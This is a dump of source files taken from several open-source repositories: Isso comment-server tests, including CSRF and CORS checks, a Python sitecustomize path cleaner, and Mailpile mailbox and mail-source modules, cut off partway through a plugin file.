client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'First'}))
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Second', 'parent': 1}))
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Third 1', 'parent': 2}))
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Third 2', 'parent': 2}))
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': '...'}))
client.delete('/id/1')
assert self.get('/?uri=%2Fpath%2F').status_code == 200
client.delete('/id/2')
assert self.get('/?uri=%2Fpath%2F').status_code == 200
client.delete('/id/3')
assert self.get('/?uri=%2Fpath%2F').status_code == 200
client.delete('/id/4')
assert self.get('/?uri=%2Fpath%2F').status_code == 200
client.delete('/id/5')
assert self.get('/?uri=%2Fpath%2F').status_code == 404
def testPathVariations(self):
paths = ['/sub/path/', '/path.html', '/sub/path.html', 'path', '/']
for path in paths:
assert self.post('/new?' + urlencode({'uri': path}),
data=json.dumps({'text': '...'})).status_code == 201
for i, path in enumerate(paths):
assert self.get('/?' + urlencode({'uri': path})).status_code == 200
assert self.get('/id/%i' % (i + 1)).status_code == 200
def testDeleteAndCreateByDifferentUsersButSamePostId(self):
mallory = JSONClient(self.app, Response)
mallory.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Foo'}))
mallory.delete('/id/1')
bob = JSONClient(self.app, Response)
bob.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Bar'}))
assert mallory.delete('/id/1').status_code == 403
assert bob.delete('/id/1').status_code == 200
def testHash(self):
a = self.post('/new?uri=%2Fpath%2F', data=json.dumps({"text": "Aaa"}))
b = self.post('/new?uri=%2Fpath%2F', data=json.dumps({"text": "Bbb"}))
c = self.post('/new?uri=%2Fpath%2F', data=json.dumps({"text": "Ccc", "email": "..."}))
assert a.status_code == b.status_code == c.status_code == 201
a = loads(a.data)
b = loads(b.data)
c = loads(c.data)
assert isinstance(int(a['hash'], 16), int)
assert a['hash'] != '192.168.1.1'
assert a['hash'] == b['hash']
assert a['hash'] != c['hash']
def testVisibleFields(self):
rv = self.post('/new?uri=%2Fpath%2F', data=json.dumps({"text": "..."}))
assert rv.status_code == 201
rv = loads(rv.data)
for key in comments.API.FIELDS:
rv.pop(key)
assert not any(rv.keys())
def testCounts(self):
assert self.get('/count?uri=%2Fpath%2F').status_code == 404
self.post('/new?uri=%2Fpath%2F', data=json.dumps({"text": "..."}))
rv = self.get('/count?uri=%2Fpath%2F')
assert rv.status_code == 200
assert loads(rv.data) == 1
for x in range(3):
self.post('/new?uri=%2Fpath%2F', data=json.dumps({"text": "..."}))
rv = self.get('/count?uri=%2Fpath%2F')
assert rv.status_code == 200
assert loads(rv.data) == 4
for x in range(4):
self.delete('/id/%i' % (x + 1))
rv = self.get('/count?uri=%2Fpath%2F')
assert rv.status_code == 404
def testModify(self):
self.post('/new?uri=test', data=json.dumps({"text": "Tpyo"}))
self.put('/id/1', data=json.dumps({"text": "Tyop"}))
assert loads(self.get('/id/1').data)["text"] == "<p>Tyop</p>"
self.put('/id/1', data=json.dumps({"text": "Typo"}))
assert loads(self.get('/id/1').data)["text"] == "<p>Typo</p>"
def testDeleteCommentRemovesThread(self):
rv = self.client.post('/new?uri=%2F', data=json.dumps({"text": "..."}))
assert '/' in self.app.db.threads
self.client.delete('/id/1')
assert '/' not in self.app.db.threads
def testCSRF(self):
js = "application/json"
form = "application/x-www-form-urlencoded"
self.post('/new?uri=%2F', data=json.dumps({"text": "..."}))
# no header is fine (default for XHR)
assert self.post('/id/1/dislike', content_type="").status_code == 200
# x-www-form-urlencoded is definitely not RESTful
assert self.post('/id/1/dislike', content_type=form).status_code == 403
assert self.post('/new?uri=%2F', data=json.dumps({"text": "..."}),
content_type=form).status_code == 403
# just for the record
assert self.post('/id/1/dislike', content_type=js).status_code == 200
def testCheckIP(self):
assert self.get('/check-ip').data.decode("utf-8") == '192.168.1.0'
class TestModeratedComments(unittest.TestCase):
def setUp(self):
fd, self.path = tempfile.mkstemp()
conf = core.Config.load(None)
conf.set("general", "dbpath", self.path)
conf.set("moderation", "enabled", "true")
conf.set("guard", "enabled", "off")
class App(Isso, core.Mixin):
pass
self.app = App(conf)
self.app.wsgi_app = FakeIP(self.app.wsgi_app, "192.168.1.1")
self.client = JSONClient(self.app, Response)
def tearDown(self):
os.unlink(self.path)
def testAddComment(self):
rv = self.client.post('/new?uri=test', data=json.dumps({"text": "..."}))
assert rv.status_code == 202
assert self.client.get('/id/1').status_code == 200
assert self.client.get('/?uri=test').status_code == 404
self.app.db.comments.activate(1)
assert self.client.get('/?uri=test').status_code == 200
class TestPurgeComments(unittest.TestCase):
def setUp(self):
fd, self.path = tempfile.mkstemp()
conf = core.Config.load(None)
conf.set("general", "dbpath", self.path)
conf.set("moderation", "enabled", "true")
conf.set("guard", "enabled", "off")
class App(Isso, core.Mixin):
pass
self.app = App(conf)
self.app.wsgi_app = FakeIP(self.app.wsgi_app, "192.168.1.1")
self.client = JSONClient(self.app, Response)
def testPurgeDoesNoHarm(self):
self.client.post('/new?uri=test', data=json.dumps({"text": "..."}))
self.app.db.comments.activate(1)
self.app.db.comments.purge(0)
assert self.client.get('/?uri=test').status_code == 200
def testPurgeWorks(self):
self.client.post('/new?uri=test', data=json.dumps({"text": "..."}))
self.app.db.comments.purge(0)
assert self.client.get('/id/1').status_code == 404
self.client.post('/new?uri=test', data=json.dumps({"text": "..."}))
self.app.db.comments.purge(3600)
assert self.client.get('/id/1').status_code == 200
```
#### File: isso/specs/test_cors.py
```python
from __future__ import unicode_literals
from werkzeug.test import Client
from werkzeug.wrappers import Response
from isso.wsgi import CORSMiddleware
from isso.utils import origin
def hello_world(environ, start_response):
start_response('200 OK', [('Content-Type', 'text/html')])
return ["Hello, World."]
def test_simple_CORS():
app = CORSMiddleware(hello_world, origin=origin([
"https://example.tld/",
"http://example.tld/",
"http://example.tld",
]))
client = Client(app, Response)
rv = client.get("/", headers={"ORIGIN": "https://example.tld"})
assert rv.headers["Access-Control-Allow-Origin"] == "https://example.tld"
assert rv.headers["Access-Control-Allow-Headers"] == "Origin, Content-Type"
assert rv.headers["Access-Control-Allow-Credentials"] == "true"
assert rv.headers["Access-Control-Allow-Methods"] == "GET, POST, PUT, DELETE"
assert rv.headers["Access-Control-Expose-Headers"] == "X-Set-Cookie"
a = client.get("/", headers={"ORIGIN": "http://example.tld"})
assert a.headers["Access-Control-Allow-Origin"] == "http://example.tld"
b = client.get("/", headers={"ORIGIN": "http://example.tld"})
assert b.headers["Access-Control-Allow-Origin"] == "http://example.tld"
c = client.get("/", headers={"ORIGIN": "http://foo.other"})
assert c.headers["Access-Control-Allow-Origin"] == "https://example.tld"
def test_preflight_CORS():
app = CORSMiddleware(hello_world, origin=origin(["http://example.tld"]))
client = Client(app, Response)
rv = client.open(method="OPTIONS", path="/", headers={"ORIGIN": "http://example.tld"})
assert rv.status_code == 200
for hdr in ("Origin", "Headers", "Credentials", "Methods"):
assert "Access-Control-Allow-%s" % hdr in rv.headers
assert rv.headers["Access-Control-Allow-Origin"] == "http://example.tld"
```
#### File: isso/specs/test_migration.py
```python
import tempfile
from os.path import join, dirname
from isso.core import Config
from isso.db import SQLite3
from isso.migrate import disqus
def test_disqus():
xml = join(dirname(__file__), "disqus.xml")
xxx = tempfile.NamedTemporaryFile()
db = SQLite3(xxx.name, Config.load(None))
disqus(db, xml)
assert db.threads["/"]["title"] == "Hello, World!"
assert db.threads["/"]["id"] == 1
a = db.comments.get(1)
assert a["author"] == "peter"
assert a["email"] == "<EMAIL>"
b = db.comments.get(2)
assert b["parent"] == a["id"]
``` |
{
"source": "JocelynDelalande/linuxdeploy-plugin-python",
"score": 3
} |
#### File: linuxdeploy-plugin-python/share/sitecustomize.py
```python
import os
import sys
def clean_path():
site_packages = "/usr/local/lib/python{:}.{:}/site-packages".format(
*sys.version_info[:2])
binaries_path = "/usr/local/bin"
env_path = os.getenv("PYTHONPATH")
if env_path is None:
env_path = []
else:
env_path = [os.path.realpath(path) for path in env_path.split(":")]
if ((os.path.dirname(sys.executable) != binaries_path) and
(site_packages not in env_path)):
# Remove the builtin site-packages from the path
try:
sys.path.remove(site_packages)
except ValueError:
pass
clean_path()
``` |
{
"source": "JocelynDelalande/Mailpile",
"score": 2
} |
#### File: mailpile/mailboxes/wervd.py
```python
import email.generator
import email.message
import mailbox
import StringIO
import sys
import mailpile.mailboxes
from mailpile.i18n import gettext as _
from mailpile.i18n import ngettext as _n
from mailpile.mailboxes import UnorderedPicklable
from mailpile.crypto.streamer import *
from mailpile.util import safe_remove
class MailpileMailbox(UnorderedPicklable(mailbox.Maildir, editable=True)):
"""A Maildir class that supports pickling and a few mailpile specifics."""
supported_platform = None
@classmethod
def parse_path(cls, config, fn, create=False):
if (((cls.supported_platform is None) or
(cls.supported_platform == sys.platform[:3].lower())) and
((os.path.isdir(fn) and
os.path.exists(os.path.join(fn, 'cur')) and
os.path.exists(os.path.join(fn, 'wervd.ver'))) or
(create and not os.path.exists(fn)))):
return (fn, )
raise ValueError('Not a Maildir: %s' % fn)
def __init2__(self, *args, **kwargs):
open(os.path.join(self._path, 'wervd.ver'), 'w+b').write('0')
def remove(self, key):
# FIXME: Remove all the copies of this message!
fn = self._lookup(key)
del self._toc[key]
safe_remove(fn)
def _refresh(self):
mailbox.Maildir._refresh(self)
# WERVD mail names don't have dots in them
for t in [k for k in self._toc.keys() if '.' in k]:
del self._toc[t]
safe_remove() # Try to remove any postponed removals
def _get_fd(self, key):
fd = open(os.path.join(self._path, self._lookup(key)), 'rb')
key = self._decryption_key_func()
if key:
fd = DecryptingStreamer(fd, mep_key=key, name='WERVD')
return fd
def get_message(self, key):
"""Return a Message representation or raise a KeyError."""
with self._get_fd(key) as fd:
if self._factory:
return self._factory(fd)
else:
return mailbox.MaildirMessage(fd)
def get_string(self, key):
with self._get_fd(key) as fd:
return fd.read()
def get_file(self, key):
return StringIO.StringIO(self.get_string(key))
def add(self, message, copies=1):
"""Add message and return assigned key."""
key = self._encryption_key_func()
es = None
try:
tmpdir = os.path.join(self._path, 'tmp')
if key:
es = EncryptingStreamer(key,
dir=tmpdir, name='WERVD',
delimited=False)
else:
es = ChecksummingStreamer(dir=tmpdir, name='WERVD')
self._dump_message(message, es)
es.finish()
# We are using the MD5 to detect file system corruption, not in a
# security context - so using as little as 40 bits should be fine.
saved = False
key = None
for l in range(10, len(es.outer_md5sum)):
key = es.outer_md5sum[:l]
fn = os.path.join(self._path, 'new', key)
if not os.path.exists(fn):
es.save(fn)
saved = self._toc[key] = os.path.join('new', key)
break
if not saved:
raise mailbox.ExternalClashError(_('Could not find a filename '
'for the message.'))
for cpn in range(1, copies):
fn = os.path.join(self._path, 'new', '%s.%s' % (key, cpn))
with mailbox._create_carefully(fn) as ofd:
es.save_copy(ofd)
return key
finally:
if es is not None:
es.close()
def _dump_message(self, message, target):
if isinstance(message, email.message.Message):
gen = email.generator.Generator(target, False, 0)
gen.flatten(message)
elif isinstance(message, str):
target.write(message)
else:
raise TypeError(_('Invalid message type: %s') % type(message))
def __setitem__(self, key, message):
raise IOError(_('Mailbox messages are immutable'))
mailpile.mailboxes.register(15, MailpileMailbox)
```
#### File: mailpile/mail_source/__init__.py
```python
import os
import random
import re
import thread
import threading
import traceback
import time
import mailpile.util
from mailpile.eventlog import Event
from mailpile.i18n import gettext as _
from mailpile.i18n import ngettext as _n
from mailpile.mailboxes import *
from mailpile.mailutils import FormatMbxId
from mailpile.util import *
__all__ = ['mbox', 'maildir', 'imap']
GLOBAL_RESCAN_LOCK = MSrcLock()
class BaseMailSource(threading.Thread):
"""
MailSources take care of managing a group of mailboxes, synchronizing
the source with Mailpile's local metadata and/or caches.
"""
DEFAULT_JITTER = 15 # Fudge factor to tame thundering herds
SAVE_STATE_INTERVAL = 3600 # How frequently we pickle our state
INTERNAL_ERROR_SLEEP = 900 # Pause time on error, in seconds
RESCAN_BATCH_SIZE = 100 # Index at most this many new e-mails at once
MAX_MAILBOXES = 100 # Max number of mailboxes we add
MAX_PATHS = 5000 # Abort if asked to scan too many directories
# This is a helper for the events.
__classname__ = 'mailpile.mail_source.BaseMailSource'
def __init__(self, session, my_config):
threading.Thread.__init__(self)
self.daemon = mailpile.util.TESTING
self._lock = MSrcRLock()
self.my_config = my_config
self.name = my_config.name
self.session = session
self.alive = None
self.event = None
self.jitter = self.DEFAULT_JITTER
self._state = 'Idle'
self._sleeping = None
self._interrupt = None
self._rescanning = False
self._rescan_waiters = []
self._loop_count = 0
self._last_rescan_count = 0
self._last_rescan_completed = False
self._last_rescan_failed = False
self._last_saved = time.time() # Saving right away would be silly
def __str__(self):
rv = ': '.join([threading.Thread.__str__(self), self._state])
if self._sleeping > 0:
rv += '(%s)' % self._sleeping
return rv
def _pfn(self):
return 'mail-source.%s' % self.my_config._key
def _load_state(self):
with self._lock:
config, my_config = self.session.config, self.my_config
events = list(config.event_log.incomplete(source=self,
data_id=my_config._key))
if events:
self.event = events[0]
else:
self.event = config.event_log.log(
source=self,
flags=Event.RUNNING,
message=_('Starting up'),
data={'id': my_config._key})
if 'counters' not in self.event.data:
self.event.data['counters'] = {}
for c in ('copied_messages',
'indexed_messages',
'unknown_policies'):
if c not in self.event.data['counters']:
self.event.data['counters'][c] = 0
def _save_state(self):
self.session.config.event_log.log_event(self.event)
def _save_config(self):
self.session.config.save_worker.add_unique_task(
self.session, 'Save config', self.session.config.save)
def _log_status(self, message):
self.event.message = message
self.session.config.event_log.log_event(self.event)
self.session.ui.mark(message)
if 'sources' in self.session.config.sys.debug:
self.session.ui.debug('%s: %s' % (self, message))
def open(self):
"""Open mailboxes or connect to the remote mail source."""
raise NotImplemented('Please override open in %s' % self)
def close(self):
"""Close mailboxes or disconnect from the remote mail source."""
raise NotImplemented('Please override open in %s' % self)
def _has_mailbox_changed(self, mbx, state):
"""For the default sync_mail routine, report if mailbox changed."""
raise NotImplemented('Please override _has_mailbox_changed in %s'
% self)
def _mark_mailbox_rescanned(self, mbx, state):
"""For the default sync_mail routine, note mailbox was rescanned."""
raise NotImplemented('Please override _mark_mailbox_rescanned in %s'
% self)
def _path(self, mbx):
if mbx.path.startswith('@'):
return self.session.config.sys.mailbox[mbx.path[1:]]
else:
return mbx.path
def _check_interrupt(self, clear=True):
if mailpile.util.QUITTING or self._interrupt:
if clear:
self._log_status(_('Interrupted: %s')
% (self._interrupt or _('Quitting')))
self._interrupt = None
return True
else:
return False
def _sorted_mailboxes(self):
mailboxes = self.my_config.mailbox.values()
mailboxes.sort(key=lambda m: ('inbox' in m.name.lower() and 1 or 2,
'sent' in m.name.lower() and 1 or 2,
m.name))
return mailboxes
def sync_mail(self):
"""Iterates through all the mailboxes and scans if necessary."""
config = self.session.config
self._last_rescan_count = rescanned = errors = 0
self._last_rescan_completed = True
self._last_rescan_failed = False
self._interrupt = None
batch = self.RESCAN_BATCH_SIZE
errors = rescanned = 0
ostate = self._state
for mbx_cfg in self._sorted_mailboxes():
try:
with self._lock:
mbx_key = FormatMbxId(mbx_cfg._key)
path = self._path(mbx_cfg)
if (path in ('/dev/null', '', None)
or mbx_cfg.policy in ('ignore', 'unknown')):
continue
# Generally speaking, we only rescan if a mailbox looks like
# it has changed. However, 1/50th of the time we take a look
# anyway just in case looks are deceiving.
state = {}
if batch > 0 and (self._has_mailbox_changed(mbx_cfg, state) or
random.randint(0, 50) == 10):
self._state = 'Waiting... (rescan)'
with GLOBAL_RESCAN_LOCK:
if self._check_interrupt(clear=False):
self._last_rescan_completed = False
break
count = self.rescan_mailbox(mbx_key, mbx_cfg, path,
stop_after=batch)
if count >= 0:
self.event.data['counters']['indexed_messages'] += count
batch -= count
complete = ((count == 0 or batch > 0) and
not self._interrupt and
not mailpile.util.QUITTING)
if complete:
rescanned += 1
# If there was a copy, check if it completed
if not self.event.data.get('copying',
{'complete': True}
).get('complete'):
complete = False
# If there was a rescan, check if it completed
if not self.event.data.get('rescan',
{'complete': True}
).get('complete'):
complete = False
# OK, everything looks complete, mark it!
if complete:
self._mark_mailbox_rescanned(mbx_cfg, state)
else:
self._last_rescan_completed = False
else:
self._last_rescan_failed = True
self._last_rescan_completed = False
errors += 1
except (NoSuchMailboxError, IOError, OSError):
self._last_rescan_failed = True
errors += 1
except:
self._last_rescan_failed = True
self._log_status(_('Internal error'))
raise
self._state = 'Waiting... (disco)'
discovered = 0
with GLOBAL_RESCAN_LOCK:
if not self._check_interrupt():
discovered = self.discover_mailboxes()
status = []
if discovered > 0:
status.append(_('Discovered %d mailboxes') % discovered)
if discovered < 1 or rescanned > 0:
status.append(_('Rescanned %d mailboxes') % rescanned)
if errors:
status.append(_('Failed to rescan %d') % errors)
self._log_status(', '.join(status))
self._last_rescan_count = rescanned
self._state = ostate
return rescanned
def _jitter(self, seconds):
return seconds + random.randint(0, self.jitter)
def _sleep(self, seconds):
if self._sleeping != 0:
self._sleeping = seconds
while (self.alive and self._sleeping > 0 and
not mailpile.util.QUITTING):
time.sleep(min(1, self._sleeping))
self._sleeping -= 1
self._sleeping = None
play_nice_with_threads()
return (self.alive and not mailpile.util.QUITTING)
def _existing_mailboxes(self):
return set(self.session.config.sys.mailbox +
[mbx_cfg.local
for mbx_cfg in self.my_config.mailbox.values()
if mbx_cfg.local])
def _update_unknown_state(self):
have_unknown = 0
for mailbox in self.my_config.mailbox.values():
if mailbox.policy == 'unknown':
have_unknown += 1
self.event.data['counters']['unknown_policies'] = have_unknown
self.event.data['have_unknown'] = (have_unknown > 0)
def discover_mailboxes(self, paths=None):
config = self.session.config
self._log_status(_('Checking for new mailboxes'))
ostate, self._state = self._state, 'Discovery'
try:
existing = self._existing_mailboxes()
max_mailboxes = self.MAX_MAILBOXES - len(existing)
adding = []
paths = (paths or self.my_config.discovery.paths)[:]
while paths:
raw_fn = paths.pop(0)
fn = os.path.normpath(os.path.expanduser(raw_fn))
fn = os.path.abspath(fn)
if not os.path.exists(fn):
continue
if (raw_fn not in existing and
fn not in existing and
fn not in adding):
if self.is_mailbox(fn):
adding.append(fn)
if len(adding) > max_mailboxes:
break
if os.path.isdir(fn):
try:
for f in [f for f in os.listdir(fn)
if f not in ('.', '..')]:
nfn = os.path.join(fn, f)
if (len(paths) <= self.MAX_PATHS and
os.path.isdir(nfn)):
paths.append(nfn)
elif self.is_mailbox(nfn):
paths.append(nfn)
except OSError:
pass
if len(adding) > max_mailboxes:
break
new = {}
for path in adding:
new[config.sys.mailbox.append(path)] = path
for mailbox_idx in new.keys():
mbx_cfg = self.take_over_mailbox(mailbox_idx, save=False)
if mbx_cfg.policy != 'unknown':
del new[mailbox_idx]
if adding:
self._save_config()
return len(adding)
finally:
self._state = ostate
def take_over_mailbox(self, mailbox_idx, save=True):
config = self.session.config
disco_cfg = self.my_config.discovery # Stayin' alive! Stayin' alive!
with self._lock:
mailbox_idx = FormatMbxId(mailbox_idx)
self.my_config.mailbox[mailbox_idx] = {
'path': '@%s' % mailbox_idx,
'policy': disco_cfg.policy,
'process_new': disco_cfg.process_new,
}
mbx_cfg = self.my_config.mailbox[mailbox_idx]
mbx_cfg.apply_tags.extend(disco_cfg.apply_tags)
mbx_cfg.name = self._mailbox_name(self._path(mbx_cfg))
if disco_cfg.guess_tags:
self._guess_tags(mbx_cfg)
self._create_primary_tag(mbx_cfg, save=False)
self._create_local_mailbox(mbx_cfg, save=False)
if save:
self._save_config()
return mbx_cfg
def _guess_tags(self, mbx_cfg):
if not mbx_cfg.name:
return
name = mbx_cfg.name.lower()
tags = set(mbx_cfg.apply_tags)
for tagtype in ('inbox', 'drafts', 'sent', 'spam'):
for tag in self.session.config.get_tags(type=tagtype):
if (tag.name.lower() in name or
_(tag.name).lower() in name):
tags.add(tag._key)
mbx_cfg.apply_tags = sorted(list(tags))
def _mailbox_name(self, path):
return path.split('/')[-1]
def _create_local_mailbox(self, mbx_cfg, save=True):
config = self.session.config
disco_cfg = self.my_config.discovery
if mbx_cfg.local and mbx_cfg.local != '!CREATE':
if not os.path.exists(mbx_cfg.local):
path, wervd = config.create_local_mailstore(self.session,
name=mbx_cfg.local)
mbx_cfg.local = path
if save:
self._save_config()
elif mbx_cfg.local == '!CREATE' or disco_cfg.local_copy:
path, wervd = config.create_local_mailstore(self.session)
mbx_cfg.local = path
if save:
self._save_config()
return mbx_cfg
def _create_parent_tag(self, save=True):
disco_cfg = self.my_config.discovery
if disco_cfg.parent_tag:
if disco_cfg.parent_tag == '!CREATE':
name = (self.my_config.name or
(self.my_config.username or '').split('@')[-1] or
(disco_cfg.paths and
os.path.basename(disco_cfg.paths[0])) or
self.my_config._key)
if len(name) < 4:
name = _('Mail: %s') % name
disco_cfg.parent_tag = name
disco_cfg.parent_tag = self._create_tag(disco_cfg.parent_tag,
use_existing=False,
unique=False)
return disco_cfg.parent_tag
else:
return None
def _create_primary_tag(self, mbx_cfg, save=True):
config = self.session.config
if mbx_cfg.primary_tag and (mbx_cfg.primary_tag in config.tags):
return
# Stayin' alive! Stayin' alive!
disco_cfg = self.my_config.discovery
if not disco_cfg.create_tag:
return
# We configure the primary_tag with a name, if it doesn't have
# one already.
if not mbx_cfg.primary_tag:
mbx_cfg.primary_tag = self._create_tag_name(self._path(mbx_cfg))
# If we have a policy for this mailbox, we really go and create
# tags. The gap here allows the user to edit the primary_tag
# proposal before changing the policy from 'unknown'.
if mbx_cfg.policy != 'unknown':
parent = self._create_parent_tag(save=save)
try:
mbx_cfg.primary_tag = self._create_tag(mbx_cfg.primary_tag,
use_existing=False,
unique=False,
parent=parent)
if save:
self._save_config()
except (ValueError, IndexError):
self.session.ui.debug(traceback.format_exc())
BORING_FOLDER_RE = re.compile('(?i)^(home|mail|data|user\S*|[^a-z]+)$')
def _path_to_tagname(self, path): # -> tag name
"""This converts a path to a tag name."""
path = path.replace('/.', '/')
parts = ('/' in path) and path.split('/') or path.split('\\')
parts = [p for p in parts if not re.match(self.BORING_FOLDER_RE, p)]
tagname = parts.pop(-1).split('.')[0]
# if self.my_config.name:
# tagname = '%s/%s' % (self.my_config.name, tagname)
return CleanText(tagname.replace('_', ' '),
banned=CleanText.NONALNUM + '{}[]').clean
def _unique_tag_name(self, tagname): # -> unused tag name
"""This makes sure a tagname really is unused"""
tagnameN, count = tagname, 2
while self.session.config.get_tags(tagnameN):
tagnameN = '%s (%s)' % (tagname, count)
count += 1
return tagnameN
def _create_tag_name(self, path): # -> unique tag name
"""Convert a path to a unique tag name."""
return self._unique_tag_name(self._path_to_tagname(path))
def _create_tag(self, tag_name_or_id,
use_existing=True,
unique=False, parent=None): # -> tag ID
if tag_name_or_id in self.session.config.tags:
# Short circuit if this is a tag ID for an existing tag
return tag_name_or_id
else:
tag_name = tag_name_or_id
tags = self.session.config.get_tags(tag_name)
if tags and unique:
raise ValueError('Tag name is not unique!')
elif len(tags) == 1 and use_existing:
tag_id = tags[0]._key
elif len(tags) > 1:
raise ValueError('Tag name matches multiple tags!')
else:
from mailpile.plugins.tags import AddTag, Slugify
bogus_name = 'New-Tag-%s' % len(str(self.session.config))
AddTag(self.session, arg=[bogus_name]).run(save=False)
tags = self.session.config.get_tags(bogus_name)
if tags:
tags[0].slug = Slugify(tag_name, self.session.config.tags)
tags[0].name = tag_name
if parent:
tags[0].parent = parent
tag_id = tags[0]._key
else:
raise ValueError('Failed to create tag?')
return tag_id
def interrupt_rescan(self, reason):
self._interrupt = reason or _('Aborted')
if self._rescanning:
self.session.config.index.interrupt = reason
def _process_new(self, msg, msg_ts, keywords, snippet):
return ProcessNew(self.session, msg, msg_ts, keywords, snippet)
def _copy_new_messages(self, mbx_key, mbx_cfg, stop_after=-1):
session, config = self.session, self.session.config
self.event.data['copying'] = progress = {
'running': True,
'mailbox_id': mbx_key,
'copied_messages': 0,
'copied_bytes': 0,
'complete': False
}
try:
src = config.open_mailbox(session, mbx_key, prefer_local=False)
loc = config.open_mailbox(session, mbx_key, prefer_local=True)
if src == loc:
return
keys = list(src.iterkeys())
progress.update({
'total': len(keys),
'batch_size': stop_after if (stop_after > 0) else len(keys)
})
for key in keys:
if self._check_interrupt(clear=False):
return
play_nice_with_threads()
if key not in loc.source_map:
session.ui.mark(_('Copying message: %s') % key)
data = src.get_bytes(key)
loc.add_from_source(key, data)
self.event.data['counters']['copied_messages'] += 1
progress['copied_messages'] += 1
progress['copied_bytes'] += len(data)
stop_after -= 1
if stop_after == 0:
return
progress['complete'] = True
except IOError:
# These just abort the download/read, which we're going to just
# take in stride for now.
pass
finally:
progress['running'] = False
def rescan_mailbox(self, mbx_key, mbx_cfg, path, stop_after=None):
session, config = self.session, self.session.config
with self._lock:
if self._rescanning:
return -1
self._rescanning = True
mailboxes = len(self.my_config.mailbox)
try:
ostate, self._state = self._state, 'Rescan(%s, %s)' % (mbx_key,
stop_after)
if mbx_cfg.local or self.my_config.discovery.local_copy:
# Note: We copy fewer messages than the batch allows for,
# because we might have been aborted on an earlier run and
# the rescan may need to catch up. We also start with smaller
# batch sizes, because folks are impatient.
self._log_status(_('Copying mail: %s') % path)
self._create_local_mailbox(mbx_cfg)
max_copy = min(self._loop_count,
int(1 + stop_after / (mailboxes + 1)))
self._copy_new_messages(mbx_key, mbx_cfg, stop_after=max_copy)
with self._lock:
apply_tags = mbx_cfg.apply_tags[:]
self._create_primary_tag(mbx_cfg)
if mbx_cfg.primary_tag:
tid = config.get_tag_id(mbx_cfg.primary_tag)
if tid:
apply_tags.append(tid)
play_nice_with_threads()
self._log_status(_('Rescanning: %s') % path)
if 'rescans' in self.event.data:
self.event.data['rescans'][:-mailboxes] = []
return config.index.scan_mailbox(
session, mbx_key, mbx_cfg.local or path,
config.open_mailbox,
process_new=(mbx_cfg.process_new and
self._process_new or False),
apply_tags=(apply_tags or []),
stop_after=stop_after,
event=self.event)
except ValueError:
session.ui.debug(traceback.format_exc())
return -1
finally:
self._state = ostate
self._rescanning = False
def open_mailbox(self, mbx_id, fn):
# This allows mail sources to override the default mailbox
# opening mechanism. Returning false respectfully declines.
return False
def is_mailbox(self, fn):
return False
def run(self):
self.alive = True
self._load_state()
self.event.flags = Event.RUNNING
_original_session = self.session
def sleeptime():
if self._last_rescan_completed or self._last_rescan_failed:
return self.my_config.interval
else:
return 1
self._loop_count = 0
while self._loop_count == 0 or self._sleep(self._jitter(sleeptime())):
self._loop_count += 1
if not self.my_config.enabled:
break
self.name = self.my_config.name # In case the config changes
self._update_unknown_state()
if not self.session.config.index:
continue
waiters, self._rescan_waiters = self._rescan_waiters, []
for b, e, s in waiters:
try:
b.release()
except thread.error:
pass
if s:
self.session = s
try:
if 'traceback' in self.event.data:
del self.event.data['traceback']
if self.open():
self.sync_mail()
else:
self._log_conn_errors()
next_save_time = self._last_saved + self.SAVE_STATE_INTERVAL
if self.alive and time.time() >= next_save_time:
self._save_state()
if not self.my_config.keepalive:
self.close()
elif (self._last_rescan_completed and
not self.my_config.keepalive):
self.close()
except:
self.event.data['traceback'] = traceback.format_exc()
self.session.ui.debug(self.event.data['traceback'])
self._log_status(_('Internal error! Sleeping...'))
self._sleep(self.INTERNAL_ERROR_SLEEP)
finally:
for b, e, s in waiters:
try:
e.release()
except thread.error:
pass
self.session = _original_session
self._update_unknown_state()
self._save_state()
self.event.flags = Event.COMPLETE
self._log_status(_('Shut down'))
def _log_conn_errors(self):
if 'connection' in self.event.data:
cinfo = self.event.data['connection']
if not cinfo.get('live'):
err_msg = cinfo.get('error', [None, None])[1]
if err_msg:
self._log_status(err_msg)
def wake_up(self, after=0):
self._sleeping = after
def rescan_now(self, session=None, started_callback=None):
begin, end = MSrcLock(), MSrcLock()
for l in (begin, end):
l.acquire()
try:
self._rescan_waiters.append((begin, end, session))
self.wake_up()
while not begin.acquire(False):
time.sleep(1)
if mailpile.util.QUITTING:
return self._last_rescan_count
if started_callback:
started_callback()
while not end.acquire(False):
time.sleep(1)
if mailpile.util.QUITTING:
return self._last_rescan_count
return self._last_rescan_count
except KeyboardInterrupt:
self.interrupt_rescan(_('User aborted'))
raise
finally:
for l in (begin, end):
try:
l.release()
except thread.error:
pass
def quit(self, join=False):
self.interrupt_rescan(_('Shut down'))
self.alive = False
self.wake_up()
if join:
self.join()
def ProcessNew(session, msg, msg_ts, keywords, snippet):
if 'r' in msg.get('status', '').lower():
return False
keywords.update(['%s:in' % tag._key for tag in
session.config.get_tags(type='unread')])
return True
def MailSource(session, my_config):
# FIXME: check the plugin and instanciate the right kind of mail source
# for this config section.
if my_config.protocol in ('mbox',):
from mailpile.mail_source.mbox import MboxMailSource
return MboxMailSource(session, my_config)
elif my_config.protocol in ('maildir',):
from mailpile.mail_source.maildir import MaildirMailSource
return MaildirMailSource(session, my_config)
elif my_config.protocol in ('imap', 'imap_ssl'):
from mailpile.mail_source.imap import ImapMailSource
return ImapMailSource(session, my_config)
raise ValueError(_('Unknown mail source protocol: %s'
) % my_config.protocol)
```
#### File: mailpile/plugins/html_magic.py
```python
import mailpile.config
from mailpile.commands import Command
from mailpile.i18n import gettext as _
from mailpile.i18n import ngettext as _n
from mailpile.plugins import PluginManager
from mailpile.urlmap import UrlMap
from mailpile.util import *
_plugins = PluginManager(builtin=__file__)
##[ Configuration ]###########################################################
#mailpile.plugins.register_config_section('tags', ["Tags", {
# 'name': ['Tag name', 'str', ''],
#}, {}])
#
#mailpile.plugins.register_config_variables('sys', {
# 'writable_tags': ['DEPRECATED', 'str', []],
#})
##[ Commands ]################################################################
class JsApi(Command):
"""Output API bindings, plugin code and CSS as CSS or Javascript"""
SYNOPSIS = (None, None, 'jsapi', None)
ORDER = ('Internals', 0)
HTTP_CALLABLE = ('GET', )
HTTP_AUTH_REQUIRED = 'Maybe'
def command(self, save=True, auto=False):
session, config = self.session, self.session.config
urlmap = UrlMap(session)
res = {
